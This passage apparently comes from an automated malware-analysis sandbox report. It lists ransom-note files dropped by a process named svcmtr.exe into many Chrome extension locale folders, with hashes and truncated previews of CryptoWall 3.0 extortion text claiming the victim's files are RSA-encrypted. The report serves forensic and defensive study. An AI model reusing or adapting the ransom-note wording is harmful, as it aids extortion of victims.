                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fil\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fr_CA\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\fr_CA\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\gl\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\gl\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\gu\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\gu\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hi\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hi\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hr\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hr\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hu\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\hu\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
